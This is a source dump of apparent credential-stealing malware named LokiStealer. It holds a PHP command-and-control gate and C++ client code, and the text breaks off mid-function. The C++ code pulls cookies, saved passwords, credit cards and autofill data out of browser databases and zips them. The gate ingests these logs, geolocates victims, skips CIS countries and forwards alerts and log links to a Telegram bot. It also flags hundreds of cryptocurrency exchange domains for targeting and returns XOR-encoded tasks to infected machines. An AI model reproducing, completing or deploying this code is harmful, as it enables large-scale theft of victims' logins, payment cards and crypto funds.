MAX_RECORD_LENGTH = 4; 54 | const MAX_ORG_RECORD_LENGTH = 300; 55 | const FULL_RECORD_LENGTH = 50; 56 | const US_OFFSET = 1; 57 | const CANADA_OFFSET = 677; 58 | const WORLD_OFFSET = 1353; 59 | const FIPS_RANGE = 360; 60 | const SHM_KEY = 0x4f415401; 61 | 62 | private $flags = 0; 63 | private $filehandle; 64 | private $memoryBuffer; 65 | private $databaseType; 66 | private $databaseSegments; 67 | private $recordLength; 68 | private $shmid; 69 | private static $instances = array(); 70 | 71 | function __construct($filename = null, $flags = null) { 72 | if ($filename !== null) { 73 | $this->open($filename, $flags); 74 | } 75 | self::$instances[$filename] = $this; 76 | } 77 | static function getInstance($filename = null, $flags = null) { 78 | if (!isset(self::$instances[$filename])) { 79 | self::$instances[$filename] = new geo_ip($filename, $flags); 80 | } 81 | return self::$instances[$filename]; 82 | } 83 | function open($filename, $flags = null) { 84 | if ($flags !== null) { 85 | $this->flags = $flags; 86 | } 87 | if ($this->flags & self::SHARED_MEMORY) { 88 | $this->shmid = @shmop_open(self::SHM_KEY, "a", 0, 0); 89 | if ($this->shmid === false) { 90 | $this->loadSharedMemory($filename); 91 | $this->shmid = @shmop_open(self::SHM_KEY, "a", 0, 0); 92 | if ($this->shmid === false) { 93 | throw new Exception("Unable to open shared memory at key: " . dechex(self::SHM_KEY)); 94 | } 95 | } 96 | } else { 97 | $this->filehandle = fopen($filename, "rb"); 98 | if (!$this->filehandle) { 99 | throw new Exception("Unable to open file: $filename"); 100 | } 101 | if ($this->flags & self::MEMORY_CACHE) { 102 | $s_array = fstat($this->filehandle); 103 | $this->memoryBuffer = fread($this->filehandle, $s_array['size']); 104 | } 105 | } 106 | $this->setupSegments(); 107 | } 108 | private function loadSharedMemory($filename) { 109 | $fp = fopen($filename, "rb"); 110 | if (!$fp) { 111 | throw new Exception("Unable to open file: $filename"); 112 | } 113 | $s_array = fstat($fp); 114 | $size = $s_array['size']; 115 | if ($shmid = shmop_open(self::SHM_KEY, "w", 0, 0)) { 116 | shmop_delete ($shmid); 117 | shmop_close ($shmid); 118 | } 119 | $shmid = shmop_open(self::SHM_KEY, "c", 0644, $size); 120 | shmop_write($shmid, fread($fp, $size), 0); 121 | shmop_close($shmid); 122 | fclose($fp); 123 | } 124 | private function setupSegments() { 125 | $this->databaseType = self::COUNTRY_EDITION; 126 | $this->recordLength = self::STANDARD_RECORD_LENGTH; 127 | if ($this->flags & self::SHARED_MEMORY) { 128 | $offset = shmop_size($this->shmid) - 3; 129 | for ($i = 0; $i < self::STRUCTURE_INFO_MAX_SIZE; $i++) { 130 | $delim = shmop_read($this->shmid, $offset, 3); 131 | $offset += 3; 132 | if ($delim == (chr(255).chr(255).chr(255))) { 133 | $this->databaseType = ord(shmop_read($this->shmid, $offset, 1)); 134 | $offset++; 135 | if ($this->databaseType === self::REGION_EDITION_REV0) { 136 | $this->databaseSegments = self::STATE_BEGIN_REV0; 137 | } elseif ($this->databaseType === self::REGION_EDITION_REV1) { 138 | $this->databaseSegments = self::STATE_BEGIN_REV1; 139 | } elseif (($this->databaseType === self::CITY_EDITION_REV0) || ($this->databaseType === self::CITY_EDITION_REV1) || ($this->databaseType === self::ORG_EDITION)) { 140 | $this->databaseSegments = 0; 141 | $buf = shmop_read($this->shmid, $offset, self::SEGMENT_RECORD_LENGTH); 142 | for ($j = 0; $j < self::SEGMENT_RECORD_LENGTH; $j++) { 143 | $this->databaseSegments += (ord($buf[$j]) << ($j * 8)); 144 | } 145 | if ($this->databaseType === self::ORG_EDITION) { 146 | $this->recordLength = self::ORG_RECORD_LENGTH; 147 | } 148 | } 149 | break; 150 | } else { 151 | $offset -= 4; 152 | } 153 | } 154 | if ($this->databaseType == self::COUNTRY_EDITION) { 155 | $this->databaseSegments = self::COUNTRY_BEGIN; 156 | } 157 | } else { 158 | $filepos = ftell($this->filehandle); 159 | fseek($this->filehandle, -3, SEEK_END); 160 | for ($i = 0; $i < self::STRUCTURE_INFO_MAX_SIZE; $i++) { 161 | $delim = fread($this->filehandle, 3); 162 | if ($delim == (chr(255).chr(255).chr(255))) { 163 | $this->databaseType = ord(fread($this->filehandle,1)); 164 | if ($this->databaseType === self::REGION_EDITION_REV0) { 165 | $this->databaseSegments = self::STATE_BEGIN_REV0; 166 | } elseif($this->databaseType === self::REGION_EDITION_REV1) { 167 | $this->databaseSegments = self::STATE_BEGIN_REV1; 168 | } elseif ($this->databaseType === self::CITY_EDITION_REV0 || $this->databaseType === self::CITY_EDITION_REV1 || $this->databaseType === self::ORG_EDITION) { 169 | $this->databaseSegments = 0; 170 | $buf = fread($this->filehandle, self::SEGMENT_RECORD_LENGTH); 171 | for ($j = 0; $j < self::SEGMENT_RECORD_LENGTH; $j++) { 172 | $this->databaseSegments += (ord($buf[$j]) << ($j * 8)); 173 | } 174 | if ($this->databaseType === self::ORG_EDITION) { 175 | $this->recordLength = self::ORG_RECORD_LENGTH; 176 | } 177 | } 178 | break; 179 | } else { 180 | fseek($this->filehandle, -4, SEEK_CUR); 181 | } 182 | } 183 | if ($this->databaseType === self::COUNTRY_EDITION) { 184 | $this->databaseSegments = self::COUNTRY_BEGIN; 185 | } 186 | fseek($this->filehandle, $filepos, SEEK_SET); 187 | } 188 | } 189 | private function lookupCountryId($addr) { 190 | $ipnum = ip2long($addr); 191 | if ($ipnum === false) { 192 | throw new Exception("Invalid IP address: " . var_export($addr, true)); 193 | } 194 | if ($this->databaseType !== self::COUNTRY_EDITION) { 195 | throw new Exception("Invalid database type; lookupCountry*() methods expect Country database."); 196 | } 197 | return $this->seekCountry($ipnum) - self::COUNTRY_BEGIN; 198 | } 199 | function lookupCountryCode($addr) { 200 | return self::$COUNTRY_CODES[$this->lookupCountryId($addr)]; 201 | } 202 | function lookupCountryName($addr) { 203 | return self::$COUNTRY_NAMES[$this->lookupCountryId($addr)]; 204 | } 205 | private function seekCountry($ipnum) { 206 | $offset = 0; 207 | for ($depth = 31; $depth >= 0; --$depth) { 208 | if ($this->flags & self::MEMORY_CACHE) { 209 | $buf = substr($this->memoryBuffer, 2 * $this->recordLength * $offset, 2 * $this->recordLength); 210 | } elseif ($this->flags & self::SHARED_MEMORY) { 211 | $buf = shmop_read ($this->shmid, 2 * $this->recordLength * $offset, 2 * $this->recordLength ); 212 | } else { 213 | if (fseek($this->filehandle, 2 * $this->recordLength * $offset, SEEK_SET) !== 0) { 214 | throw new Exception("fseek failed"); 215 | } 216 | $buf = fread($this->filehandle, 2 * $this->recordLength); 217 | } 218 | $x = array(0,0); 219 | for ($i = 0; $i < 2; ++$i) { 220 | for ($j = 0; $j < $this->recordLength; ++$j) { 221 | $x[$i] += ord($buf[$this->recordLength * $i + $j]) << ($j * 8); 222 | } 223 | } 224 | if ($ipnum & (1 << $depth)) { 225 | if ($x[1] >= $this->databaseSegments) { 226 | return $x[1]; 227 | } 228 | $offset = $x[1]; 229 | } else { 230 | if ($x[0] >= $this->databaseSegments) { 231 | return $x[0]; 232 | } 233 | $offset = $x[0]; 234 | } 235 | } 236 | throw new Exception("Error traversing database - perhaps it is corrupt?"); 237 | } 238 | } 239 | ?> -------------------------------------------------------------------------------- /Panel/gate.php: -------------------------------------------------------------------------------- 1 | open($zipname, ZipArchive::CREATE); 54 | $zip->addFromString('logs.zip', base64_decode($aaaaa)); 55 | 56 | 57 | $dira = 'logs.zip'; 58 | $dir = $_SERVER['DOCUMENT_ROOT'].'/'.$dira; 59 | 60 | if(move_uploaded_file($tmp,$dir)) 61 | { 62 | 63 | $ip_info = file_get_contents('https://ip.nf/'.$ip.'.json'); 64 | $json = json_decode($ip_info); 65 | 66 | $ip_info_ .= 'IP: '.$json->ip->ip."
"; 67 | $ip_info_ .= 'provider: '.$json->ip->asn."
"; 68 | $ip_info_ .= 'netmask: '.$json->ip->netmask."
"; 69 | $ip_info_ .= 'hostname: '.$json->ip->hostname."
"; 70 | $ip_info_ .= 'city: '.$json->ip->city."
"; 71 | $ip_info_ .= 'country: '.$json->ip->country."
"; 72 | $ip_info_ .= 'country_code: '.$json->ip->country_code."
"; 73 | $date = time(); 74 | 75 | mysqli_query($db,$s); 76 | 77 | 78 | 79 | 80 | if ($res) 81 | { 82 | 83 | 84 | 85 | $ip_info_ = str_replace('
',"\n",$ip_info_); 86 | $ip_info_ = str_replace('','',$ip_info_); 87 | $ip_info_ = str_replace('','',$ip_info_); 88 | 89 | $time = date('h:i:s'); 90 | $info = "э НэД” аŸб€аИбˆб‘аЛ аНаОаВб‹аЙ аЛаОаГ!\n\nт„ЙяИ а”аАаНаНб‹аЕ IP:\n\n $ip_info_"; 91 | $content = array( 92 | 'chat_id' => $chat_id, 93 | 'text' => $info, 94 | 'parse_mode'=>'HTML', 95 | ); 96 | file_get_contents($url."/sendmessage?".http_build_query($content)); 97 | 98 | $url_log = 'https://'.$_SERVER['SERVER_NAME'].'/files/'.$file; 99 | $content = array( 100 | 'chat_id' => $chat_id, 101 | 'document'=>$url_log, 102 | 'parse_mode'=>'HTML', 103 | ); 104 | file_get_contents($url."/sendDocument?".http_build_query($content)); 105 | 106 | } 107 | } 108 | } 109 | $file = $dir; 110 | $hwid = $array['hwid']; 111 | $settings = $pdoConnection->query("SELECT * FROM `settings`")->fetch(); 112 | $currentLog = $pdoConnection->query("SELECT COUNT(*) FROM logs WHERE hwid = '" . $hwid . "'")->fetchColumn(0); 113 | $zip = new ZipArchive; 114 | $res = $zip->open($_SERVER['DOCUMENT_ROOT'].'/'.$dira); 115 | $zip->extractTo("logs/" . $hwid); 116 | 117 | $zip->extractTo("logs/" . $hwid); 118 | $zip->close(); 119 | 120 | if($settings[2]=='on'&&$currentLog>=0||$settings[2]=='off'&&$currentLog==0){ 121 | 122 | if ($res === TRUE) { 123 | $count = $zip->numFiles; 124 | for ($i = 0; $i < $count; $i++) 125 | { 126 | $stat = $zip->statIndex ($i); 127 | if(stripos($stat['name'],".php")!==FALSE||stripos($stat['name'],".htm")!==FALSE||stripos($stat['name'],".asp")!==FALSE){ 128 | deleteTmp($file); 129 | die(); 130 | } 131 | } 132 | $os = strip_tags($_GET['os']); 133 | $cookie = $array['cookies']; 134 | $pswd =$array['passwords']; 135 | $version = '2.0'; 136 | $cc = $array['cc']; 137 | $wallet = strip_tags($_GET['wallet']); 138 | $fileCount = strip_tags($_GET['file']); 139 | $autofill =$array['autofill']; 140 | $userid =1; 141 | $ip = $_SERVER["REMOTE_ADDR"]; 142 | $date = time(); 143 | $geolocationString = "IP : " . $ip . "\r\n"; 144 | for ($crashes = 0; $crashes < 5; $crashes++) { 145 | try { 146 | $loc = json_decode(file_get_contents('http://ip-api.com/json/' . $ip), true); 147 | $country = $loc["country"]; 148 | $countryCode = $loc['countryCode']; 149 | $geolocationString = $geolocationString . "Country Code : " . $loc['countryCode'] . "\r\n"; 150 | $geolocationString = $geolocationString . "Country : " . $loc['country'] . "\r\n"; 151 | $geolocationString = $geolocationString . "State Name : " . $loc['regionName'] . "\r\n"; 152 | $geolocationString = $geolocationString . "City : " . $loc['city'] . "\r\n"; 153 | $geolocationString = $geolocationString . "Timezone : " . $loc['timezone'] . "\r\n"; 154 | $geolocationString = $geolocationString . "ZIP : " . $loc['zip'] . "\r\n"; 155 | $geolocationString = $geolocationString . "ISP : " . $loc['isp'] . "\r\n"; 156 | $geolocationString = $geolocationString . "Coordinates : " . $loc['lat'] . " , " . $loc['lon'] . "\r\n\r\n"; 157 | break; 158 | } 159 | catch(Exception $e) { 160 | $country = "ERROR"; 161 | } 162 | } 163 | if($country == "ERROR"){ 164 | require_once("assets/GeoIP/geoip.php"); 165 | $country = ip_name($ip); 166 | $countryCode= ip_code($ip); 167 | $geolocationString = $geolocationString . "Country Code : " . $countryCode . "\r\n"; 168 | $geolocationString = $geolocationString . "Country : " . $country . "\r\n"; 169 | } 170 | mkdir("logs/" . $hwid, 0777); 171 | if($settings[1]=="off"){ 172 | if($countryCode=="RU"||$countryCode=="KZ"||$countryCode=="UA"||$countryCode=="BY"){ 173 | if(!file_exists("logs/cislogs")){ 174 | mkdir("logs/cislogs",0777); 175 | } 176 | mkdir("logs/cislogs/" . $hwid, 0777); 177 | 178 | die(); 179 | } 180 | } 181 | $zip->extractTo("logs/" . $hwid); 182 | file_put_contents("logs/" . $hwid . "/" . ".htaccess","php_flag engine 0 183 | RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html 184 | AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html"); 185 | $comment = $zip->getArchiveComment(); 186 | $zip->close(); 187 | $fd = fopen("logs/" . $hwid . "/" . "information.log", 'w'); 188 | fwrite($fd, $comment); 189 | fclose($fd); 190 | $n = 2; 191 | 192 | $info = "logs/" . $hwid . "/" . "information.log"; 193 | $f = file($info); 194 | array_splice($f, $n, 0, $geolocationString); 195 | file_put_contents($info, $f); 196 | 197 | $crypto = array('freewallet.org', 'paxful.com', 'capdax.com', 'wazirx.com', 'okex.com', 'bitfinex.com', 'hitbtc.com', 'kraken.com', 'gateio.io', 'bitstamp.net', 'bittrex.com', 'exmo', 'yobit', 'poloniex.com', 'bitflyer.jp', 'livecoin.net', 'wex.nz', 'cryptonator', 'mercatox.com', 'localbitcoins.com', 'localbitcoins.net', 'luno.', 'coinpayments', 'therocktrading.com', 'etherdelta.com', 'anxpro.com', 'c-cex.com', 'gatecoin.com', 'kiwi-coin.com', 'jubi.com', 'koineks.com', 'ecoin.cc', 'koinim.com', 'litebit.eu', 'lykke.com', 'mangr.com', 'localtrade.pro', 'lbank.info', 'leoxchange.com', 'liqui.io', 'kuna.io', 'fybse.se', 'freiexchange.com', 'fybsg.com', 'gatehub.net', 'getbtc.org', 'gemini.com', 'gdax.com', 'foxbit.com.br', 'foxbit.exchange', 'flowbtc.com.br', 'exx.com', 'exrates.me', 'excambriorex.com', 'ezbtc.ca', 'fargobase.com', 'fisco.co.uk', 'glidera.io', 'indacoin.com', 'ethexindia.com', 'indx.ru', 'infinitycoin.exchange', 'idex.su', 'idex.market', 'ice3x.com', 'ice3x.co.za', 'guldentrader.com', 'exchange.guldentrader.com', 'heatwallet.com', 'hypex.nl', 'negociecoins.com.br', 'topbtc.com', 'tidex.com', 'tidebit.com', 'tradesatoshi.com', 'urdubit.com', 'tuxexchange.com', 'tdax.com', 'spacebtc.com', 'surbitcoin.com', 'surbtc.com', 'usd-x.com', 'xbtce.com', 'yunbi.com', 'zyado.com', 'trade.z.com', 'zaif.jp', 'wavesplatform.com', 'walltime.info', 'vbtc.exchange', 'vaultoro.com', 'vircurex.com', 'virtacoinworld.com', 'vwlpro.com', 'nlexch.com', 'nevbit.com', 'nocks.com', 'novaexchange.com', 'nxtplatform.org', 'neraex.pro', 'mixcoins.com', 'mr-ripple.com', 'dsx.uk', 'nzbcx.com', 'okcoin.com', 'quadrigacx.com', 'quoinex.com', 'rightbtc.com', 'ripplefox.com', 'rippex.net', 'openledger.info', 'paymium.com', 'paribu.com', 'mercadobitcoin.com.br', 'dcexe.com', 'bitmex.com', 'bitmaszyna.pl', 'bitonic.nl', 'bitpanda.com', 'bitsblockchain.net', 'bitmarket.net', 'bitlish.com', 'bitfex.trade', 'bitexbook.com', 'bitex.la', 'bitflip.cc', 'bitgrail.com', 'bitkan.com', 'bitinka.com', 'bitholic.com', 'bitsane.com', 'changer.com', 'bitshares.org', 'btcmarkets.net', 'braziliex.com', 'btc-trade.com.ua', 'btc-alpha.com', 'bl3p.eu', 'bitssa.com', 'bitspark.io', 'bitso.com', 'bitstar.com', 'ittylicious.com', 'altcointrader.co.za', 'arenabitcoin', 'allcoin.com', 'abucoins.com', 'aidosmarket.com', 'aex.com', 'acx.com', 'bancor.network', 'bitbay.net', 'indodax.com', 'bitcointrade.com.br', 'bitcointoyou.com', 'bitbanktrade.jp', 'bitbank.com', 'big.one', 'bcex.ru', 'bitconnect.co', 'bisq.network', 'bit2c.co.il', 'bit-z.com', 'btcbear.com', 'btcbox.in', 'counterwallet.io', 'freewallet.io', 'indiesquare.me', 'rarepepewallet.com', 'coss.io', 'coolcoin.com', 'crex24.com', 'cryptex.net', 'coinut.com', 'coinsbank.com', 'coinsecure.in', 'coinsquare.com', 'coinsquare.io', 'coinspot.io', 'coinmarketcap.com', 'crypto-bridge.org', 'dcex.com', 'dabtc.com', 'decentrex.com', 'deribit.com', 'dgtmarket.com', 'cryptomkt.com', 'cryptoderivatives.market', 'cryptodao.com', 'cryptomate.co.uk', 'cryptox.pl', 'cryptopia.co.nz', 'coinroom.com', 'coinrate.net', 'chbtc.com', 'chilebit.net', 'coinbase.com', 'burst-coin.org', 'poloniex.com', 'btcc.', 'binance', 'btcc.net', 'btc-trade.com.ua', 'btctrade.im', 'btcturk.com', 'btcxindia.com', 'coincheck.com', 'coinmate.io', 'coingi.com', 'coinnest.co.kr', 'coinrail.co.kr', 'coinpit.io', 'coingather.com', 'coinfloor.co.uk', 'coinegg.com', 'coincorner.com', 'coinexchange.io', 'coinfalcon.com', 'digatrade.com', 'btc-alpha.com', 'blockchain', 'minergate', 'myetherwallet.com', 'litevault.net', 'dogechain.info', 'coinome', 'bitbns', 'btc.top', 'etherdelta.com', 'btcbank.com.ua', 'coindelta.com', 'depotwallet.com', 'kryptex.org'); 198 | $game = array('steam', 'origin', 'ubi'); 199 | $money = array('paypal', 'chase.com', 'TD', 'wells', 'capitalone', 'skrill', 'PayU'); 200 | $shop = array('amazon', 'ebay', 'walmart', 'newegg', 'apple', 'bestbuy'); 201 | 202 | $cookies = "logs/" . $hwid . "/" . "passwords.log"; 203 | $taskListXOR = ""; 204 | $pdoConnection->exec("INSERT INTO `logs`(`id`, `userID`,`hwid`, `system`, `ip`, `country`, `date`, `count`, `cookie`, `pswd`, `buildversion`, `credit`, `autofill`, `wallets`, `comment`, `checked`) VALUES (null, '$userid','$hwid','$os','$ip','$country','$date', '$fileCount', '$cookie', '$pswd', '$version', '$cc', '$autofill', '$wallet','','0')"); 205 | $tasks = $pdoConnection->query("SELECT * FROM `tasks` ORDER BY `id` LIMIT 10"); 206 | while ($task = $tasks->fetch(PDO::FETCH_ASSOC)) { 207 | if ($task["count"] == 0) { 208 | $taskID = $task["id"]; 209 | $typePreset = $task['preset']; 210 | if(checkTaskParams($hwid,$pswd,$cookie,$wallet,$cc,$task['params'])) continue; 211 | if($typePreset!=="all"){ 212 | $b=0; 213 | $presetsArray = $pdoConnection->query("SELECT id,color,pattern,name FROM `presets` WHERE name='$typePreset'")->fetch(); 214 | $siteFinded = explode(";",$presetsArray['pattern']); 215 | foreach($siteFinded as $key){ 216 | if(file_exists("logs/" . $hwid . "/" . "passwords.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . "passwords.log"), $key)!==false) $b++; 217 | if(file_exists("logs/" . $hwid . "/" . "cookieDomains.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . "cookieDomains.log"), $key)!==false) $b++; 218 | } 219 | if($b==0) continue; 220 | } 221 | if ($task["country"] == "*") { 222 | $taskListXOR .= $task["task"]."~;~"; 223 | } else { 224 | $countries = explode(",", $task["country"]); 225 | 226 | foreach ($countries as $_country) { 227 | if ($_country == $loc['countryCode']) { 228 | $taskListXOR .=$task["task"]."~;~"; 229 | } 230 | } 231 | } 232 | } else if ($task["count"] > $task["status"]) { 233 | $taskID = $task["id"]; 234 | $typePreset = $task['preset']; 235 | if(checkTaskParams($hwid,$pswd,$cookie,$wallet,$cc,$task['params'])) continue; 236 | if($typePreset!=="all"){ 237 | $b=0; 238 | $presetsArray = $pdoConnection->query("SELECT id,color,pattern,name FROM `presets` WHERE name='$typePreset'")->fetch(); 239 | $siteFinded = explode("~;~",$presetsArray['pattern']); 240 | foreach($siteFinded as $key){ 241 | if(file_exists("logs/" . $hwid . "/" . "passwords.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . "passwords.log"), $key)!==false) $b++; 242 | if(file_exists("logs/" . $hwid . "/" . "cookieDomains.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . "cookieDomains.log"), $key)!==false) $b++; 243 | } 244 | if($b==0) continue; 245 | } 246 | if ($task["country"] == "*") { 247 | $pdoConnection->exec("UPDATE `tasks` SET `status`=`status` + 1 WHERE `id`='$taskID'"); 248 | 249 | $taskListXOR .=$task["task"]."~;~"; 250 | } else { 251 | $countries = explode(",", $task["country"]); 252 | foreach ($countries as $_country) { 253 | if ($_country == $loc['countryCode']) { 254 | $pdoConnection->exec("UPDATE `tasks` SET `status`=`status` + 1 WHERE `id`='$taskID'"); 255 | 256 | $taskListXOR .=$task["task"]."~;~"; 257 | } 258 | } 259 | } 260 | } 261 | 262 | } 263 | echo myxor($taskListXOR,$xorKey); 264 | } else { 265 | deleteTmp($file); 266 | die(); 267 | } 268 | } 269 | deleteTmp($file); 270 | function deleteTmp($file){ 271 | if(file_exists($file)) unlink($file); 272 | if(file_exists('tmp/'.$_SERVER['REMOTE_ADDR'])) unlink('tmp/'.$_SERVER['REMOTE_ADDR']); 273 | } 274 | function checkTaskParams($hwid,$pswd,$cookie,$wallet,$cc,$params){ 275 | $paramArray = explode(';',$params); 276 | $pass = $paramArray[0]; 277 | $cookies=$paramArray[1]; 278 | $wallets=$paramArray[2]; 279 | $jabb=$paramArray[3]; 280 | $tg=$paramArray[4]; 281 | $ccParam=$paramArray[5]; 282 | if($pass=="on"){ 283 | if ($pswd==0) return true; 284 | } 285 | if($cookies=="on"){ 286 | if ($cookie==0) return true; 287 | } 288 | if($wallets=="on"){ 289 | if ($wallet==0) return true; 290 | } 291 | if($jabb=="on"){ 292 | $fname = "logs/" . $hwid . "/jabber"; 293 | if (!file_exists($fname)) return true; 294 | } 295 | if($tg=="on"){ 296 | $fname = "logs/" . $hwid . "/Telegram"; 297 | if (!file_exists($fname)) return true; 298 | } 299 | if($ccParam=="on"){ 300 | if ($cc==0) return true; 301 | } 302 | return false; 303 | } 304 | 305 | function contains($string, Array $search, $caseInsensitive = false) 306 | { 307 | $exp = '/' 308 | . implode('|', array_map('preg_quote', $search)) 309 | . ($caseInsensitive ? '/i' : '/'); 310 | return preg_match($exp, $string) ? true : false; 311 | } 312 | 313 | function formatString($param) 314 | { 315 | $returnString = $param; 316 | $returnString = trim($returnString); 317 | $returnString = stripslashes($returnString); 318 | $returnString = htmlspecialchars($returnString); 319 | 320 | return $returnString; 321 | } 322 | function myxor($text, $key){ 323 | $outText=''; 324 | for($i=0;$i -------------------------------------------------------------------------------- /Source/LokiStealer/Source.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "telegram.h" 6 | #include "sqlite3.h" 7 | #include "export.h" 8 | #include "search.h" 9 | #include "vector.h" 10 | #include "parson.h" 11 | #include "parse.h" 12 | #include "crypt.h" 13 | #include "cred.h" 14 | #include "fncs.h" 15 | #include "mem.h" 16 | #include "cnc.h" 17 | #include "zip.h" 18 | #include "ldr.h" 19 | 20 | void enumCookies(HZIP hZip, SIZE_T* count) { 21 | vector v; 22 | vector_init(&v); 23 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 24 | searchImpl(appdata, &v, CRC32_STR(L"Cookies")); 25 | _free((void*)appdata); 26 | 27 | for (int i = 0; i < vector_count(&v); i++) { 28 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 29 | 30 | int prefix_len = 0; 31 | int encrypted_cols_index_list[1] = { 7 }; 32 | const char* prefix[] = { 0, "\t", "\t", "\t", "\t", "\t", "\t" }; 33 | 34 | for (int i = 0; i < _countof(prefix); i++) { 35 | prefix_len += lstrlenA(prefix[i]); 36 | } 37 | 38 | LPCSTR query = "SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies"; 39 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/0, 7, 40 | encrypted_cols_index_list, (char**)prefix, 1); 41 | 42 | SIZE_T s = 0; 43 | CHAR* c = 0; 44 | vec_get_str(sqlite_v, &c, &s, prefix_len); 45 | 46 | if (c) { 47 | SIZE_T tc; 48 | randomInt(&tc, 100, 999); 49 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 50 | wnsprintfW(name, MAX_PATH, L"cookies.txt", tc); 51 | ZipAdd((HZIP)hZip, name, c, s); 52 | _free(name); 53 | 54 | _free(c); 55 | vector_free(&sqlite_v); 56 | } 57 | _free(wc); 58 | 59 | } 60 | vector_free(&v); 61 | } 62 | 63 | void enumPasswords(HZIP hZip, SIZE_T* count) { 64 | vector v; 65 | vector_init(&v); 66 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 67 | searchImpl(appdata, &v, CRC32_STR(L"Login Data")); 68 | _free((void*)appdata); 69 | 70 | for (int i = 0; i < vector_count(&v); i++) { 71 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 72 | 73 | int prefix_len = 0; 74 | int encrypted_cols_index_list[1] = { 3 }; 75 | const char* prefix[] = { "Url: ", "Username: ", "Password: " }; 76 | 77 | for (int i = 0; i < _countof(prefix); i++) { 78 | prefix_len += lstrlenA(prefix[i]); 79 | } 80 | 81 | LPCSTR query = "SELECT signon_realm, username_value, password_value FROM logins"; 82 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/1, 3, 83 | encrypted_cols_index_list, (char**)prefix, 1); 84 | 85 | SIZE_T s = 0; 86 | CHAR* c = 0; 87 | vec_get_str(sqlite_v, &c, &s, prefix_len); 88 | if (c) { 89 | SIZE_T tc; 90 | randomInt(&tc, 100, 999); 91 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 92 | wnsprintfW(name, MAX_PATH, L"passwords.log", tc); 93 | ZipAdd((HZIP)hZip, name, c, s); 94 | _free(name); 95 | 96 | _free(c); 97 | vector_free(&sqlite_v); 98 | } 99 | _free(wc); 100 | } 101 | vector_free(&v); 102 | } 103 | 104 | void enumInternetexplorer(HZIP hZip, SIZE_T* count) { 105 | vector v; 106 | vector_init(&v); 107 | enumCredentials(&v, count); 108 | 109 | SIZE_T s = 0; 110 | CHAR* c = 0; 111 | vec_get_str(v, &c, &s, 1); 112 | 113 | if (c) { 114 | SIZE_T tc; 115 | randomInt(&tc, 100, 999); 116 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 117 | wnsprintfW(name, MAX_PATH, L"passwords.log", tc); 118 | ZipAdd((HZIP)hZip, name, c, s); 119 | 120 | _free(name); 121 | } 122 | _free(c); 123 | vector_free(&v); 124 | } 125 | 126 | void enumCreditcards(HZIP hZip, SIZE_T* count) { 127 | vector v; 128 | vector_init(&v); 129 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 130 | searchImpl(appdata, &v, CRC32_STR(L"Web Data")); 131 | _free((void*)appdata); 132 | 133 | for (int i = 0; i < vector_count(&v); i++) { 134 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 135 | 136 | int prefix_len = 0; 137 | int encrypted_cols_index_list[1] = { 1 }; 138 | const char* prefix[] = { "Number: ", "Mounth: ", "Year: ", "Name: ", "Web Site: " }; 139 | 140 | for (int i = 0; i < _countof(prefix); i++) { 141 | prefix_len += lstrlenA(prefix[i]); 142 | } 143 | 144 | LPCSTR query = "SELECT card_number_encrypted, expiration_month, expiration_year, name_on_card, origin FROM credit_cards"; 145 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/1, 5, 146 | encrypted_cols_index_list, (char**)prefix, 1); 147 | 148 | SIZE_T s = 0; 149 | CHAR* c = 0; 150 | vec_get_str(sqlite_v, &c, &s, prefix_len); 151 | 152 | if (c) { 153 | SIZE_T tc; 154 | randomInt(&tc, 100, 999); 155 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 156 | wnsprintfW(name, MAX_PATH, L"CreditCards.txt", tc); 157 | ZipAdd((HZIP)hZip, name, c, s); 158 | _free(name); 159 | 160 | _free(c); 161 | vector_free(&sqlite_v); 162 | } 163 | _free(wc); 164 | } 165 | vector_free(&v); 166 | } 167 | 168 | void enumAutofill(HZIP hZip, SIZE_T* count) { 169 | vector v; 170 | vector_init(&v); 171 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 172 | searchImpl(appdata, &v, CRC32_STR(L"Web Data")); 173 | _free((void*)appdata); 174 | 175 | for (int i = 0; i < vector_count(&v); i++) { 176 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 177 | 178 | int prefix_len = 0; 179 | const char* prefix[] = { "Id: ", "Value: " }; 180 | 181 | for (int i = 0; i < _countof(prefix); i++) { 182 | prefix_len += lstrlenA(prefix[i]); 183 | } 184 | 185 | LPCSTR query = "SELECT name, value FROM autofill"; 186 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/TRUE, 2, 0, (char**)prefix, 0); 187 | 188 | SIZE_T s = 0; 189 | CHAR* c = 0; 190 | vec_get_str(sqlite_v, &c, &s, prefix_len); 191 | 192 | if (c) { 193 | SIZE_T tc; 194 | randomInt(&tc, 100, 999); 195 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 196 | wnsprintfW(name, MAX_PATH, L"Autofill.txt", tc); 197 | ZipAdd((HZIP)hZip, name, c, s); 198 | _free(name); 199 | 200 | _free(c); 201 | vector_free(&sqlite_v); 202 | } 203 | _free(wc); 204 | } 205 | vector_free(&v); 206 | } 207 | 208 | void enumCrypto(HZIP hZip, SIZE_T* count) { 209 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 210 